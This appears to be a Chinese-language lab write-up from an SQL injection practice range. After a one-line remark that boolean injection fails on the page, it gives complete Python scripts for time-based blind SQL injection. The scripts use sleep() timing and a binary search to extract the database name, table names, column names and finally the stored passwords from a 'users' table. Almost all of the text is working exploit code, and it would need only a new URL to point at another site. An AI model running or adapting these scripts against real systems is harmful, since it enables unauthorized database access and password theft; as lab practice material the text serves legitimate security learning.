发现不论输入的payload正确与否,页面输出是一样的,所以不能bool注入
#encoding=utf-8 import requests import os import time url="http://192.168.182.130:8001/sqli/04.php" def DbLen(): for i in range(1,10): payload="?id=if(length(database())={},sleep(1),1)--+".format(i) req_url=url+payload start_time=time.time() rep=requests.get(url=req_url) end_time = time.time() t = end_time - start_time if t > 1: print("DB length is "+str(i)) DbLen()
def DbName(): result="" for i in range(1,8): l = 32 r = 130 mid = (l + r) >> 1 while (l < r): payload="?id=if(ord(mid((select database()),{},1))>{},sleep(1),1) --+".format(i,mid) req_url=url+payload #print(req_url) start_time=time.time() rep=requests.get(url=req_url) end_time = time.time() t = end_time - start_time if t > 1: l = mid +1 else: r = mid mid = (l + r)>>1 result=result+chr(mid) print("the result is {}".format(result)) DbName()
def TablesName(): result="" for i in range(1,50): l = 32 r = 130 mid = (l + r) >> 1 while (l < r): payload='''?id=if(ord(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(1),1) --+'''.format(i,mid) req_url=url+payload #print(req_url) start_time=time.time() rep=requests.get(url=req_url) end_time = time.time() t = end_time - start_time if t > 1: l = mid +1 else: r = mid mid = (l + r)>>1 result=result+chr(mid) print("the result is {}".format(result)) TablesName()
def ColumnsName(): result="" for i in range(1,30): l = 32 r = 130 mid = (l + r) >> 1 while (l < r): payload='''?id=if(ord(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{},sleep(1),1) --+'''.format(i,mid) req_url=url+payload #print(req_url) start_time=time.time() rep=requests.get(url=req_url) end_time = time.time() t = end_time - start_time if t > 1: l = mid +1 else: r = mid mid = (l + r)>>1 result=result+chr(mid) print("the result is {}".format(result)) ColumnsName()
def GetData(): result="" for i in range(1,50): l = 32 r = 130 mid = (l + r) >> 1 while (l < r): payload="?id=if(ord(mid((select group_concat(password) from iwebsec.users),{},1))>{},sleep(1),1) --+".format(i,mid) req_url=url+payload #print(req_url) start_time=time.time() rep=requests.get(url=req_url) end_time = time.time() t = end_time - start_time if t > 1: l = mid +1 else: r = mid mid = (l + r)>>1 result=result+chr(mid) print("the result is {}".format(result)) GetData()